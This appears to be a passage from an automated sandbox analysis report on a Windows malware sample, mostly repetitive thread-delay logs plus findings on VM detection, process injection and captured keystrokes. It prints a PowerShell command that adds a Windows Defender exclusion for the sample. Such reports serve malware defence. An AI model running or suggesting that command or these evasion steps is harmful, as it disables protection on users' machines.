                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399185s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2399077s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398530s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398201s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2398093s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397435s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397104s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2397000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396845s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396481s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396258s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2396047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2395047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394937s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5452Thread sleep time: -2394391s >= -30000s
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399654Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399546Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399431Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399327Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399216Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399109Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2399000Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398890Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398780Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398671Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398562Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398451Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398234Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2398125Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397955Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397750Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397637Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397529Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397389Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397281Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397171Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2397059Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396953Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396843Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396734Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396625Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396515Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396406Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396296Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396187Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2396078Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395968Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395859Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395750Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395640Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395531Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395421Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395282Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395164Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2395052Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394937Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394828Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394718Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394607Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394500Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394390Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeThread delayed: delay time: 2394281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399874Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398911Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398754Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398077Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397969Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397637Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397531Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397416Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397312Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397093Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395557Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394683Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394574Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394245Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399546
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399403
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399296
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399185
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399077
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398969
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398859
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398750
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398640
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398530
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398422
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398312
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398201
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398093
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397765
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397547
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397435
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397218
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397104
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396845
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396481
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396258
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394391
                    Source: Eschemyquote24573j33.exe, 00000000.00000002.2066235627.0000000000973000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\xE
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4513394772.0000000006830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeMemory written: C:\Users\user\Desktop\Eschemyquote24573j33.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory written: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Eschemyquote24573j33.exeProcess created: C:\Users\user\Desktop\Eschemyquote24573j33.exe "C:\Users\user\Desktop\Eschemyquote24573j33.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q?<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}r{Win}rTHbq@N7
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q8<b>[ Program Manager]</b> (26/09/2024 17:46:33)<br>{Win}THbq@N7
